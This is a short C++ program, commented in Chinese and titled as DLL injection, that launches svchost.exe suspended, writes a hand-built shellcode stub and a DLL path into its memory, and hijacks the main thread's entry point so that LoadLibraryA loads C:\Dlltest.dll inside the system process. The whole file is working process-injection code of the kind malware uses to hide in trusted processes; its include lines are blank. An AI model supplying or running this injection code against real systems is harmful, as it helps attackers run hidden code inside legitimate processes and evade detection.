dll注入

// DllInjection.cpp : Defines the entry point for the console application.
//

#include 
#include 

#pragma comment(lib, "Shlwapi.lib")

typedef struct _SHELL_CODE
{
	char szPath[MAX_PATH];   //加载dll的路径
	char szInstruction[0x20];   //dll代码
} SHELL_CODE, *PSHELL_CODE;

int main(int argc, CHAR* argv[])
{
	STARTUPINFO SI = {0};
	PROCESS_INFORMATION PI = {0};
	CONTEXT Context = {0};
	LPVOID Buffer = NULL;
	TCHAR ApplicationName[MAX_PATH] = "C:\\Windows\\System32\\svchost.exe";
	
	SI.cb = sizeof(SI);
	//创建子进程
	if (!CreateProcess(ApplicationName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI,	&PI))
	{
		return -1;
	}
	
	//获取主线程的Context
	Context.ContextFlags = CONTEXT_INTEGER;
	if (!GetThreadContext(PI.hThread, &Context))
	{
		return -1;
	}
	
	CHAR szDllName[] = "C:\\Dlltest.dll";
	CHAR szShellCode[] = "\x60\x68\x12\x34\x56\x78\xb8\x12\x34\x56\x78\xff\xd0\x61\xe9\x12\x34\x56\x78";
	
	//在子进程分配空间
	Buffer = VirtualAllocEx(PI.hProcess, NULL, sizeof(SHELL_CODE), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (Buffer == NULL)
	{
		return -1;
	}
	
	*(DWORD*)(szShellCode + 2) = (DWORD)Buffer;
	*(DWORD*)(szShellCode + 7) = (DWORD)LoadLibraryA;
	*(DWORD*)(szShellCode + 15) = Context.Eax - (DWORD)((PUCHAR)Buffer + FIELD_OFFSET(SHELL_CODE, szInstruction) + sizeof(szShellCode) - 1);
	
	SHELL_CODE ShellCode;
	CopyMemory(((PSHELL_CODE)&ShellCode)->szPath, szDllName, sizeof(szDllName));
	CopyMemory(((PSHELL_CODE)&ShellCode)->szInstruction, szShellCode, sizeof(szShellCode));
	
	DWORD NumberOfBytesWritten = 0;
	if (!WriteProcessMemory(PI.hProcess, Buffer, &ShellCode, sizeof(SHELL_CODE), &NumberOfBytesWritten))
	{
		return -1;
	}
	
	Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
	
	if (!SetThreadContext(PI.hThread, &Context))
	{
		return -1;
	}
	
	ResumeThread(PI.hThread);
	
	return 0;
}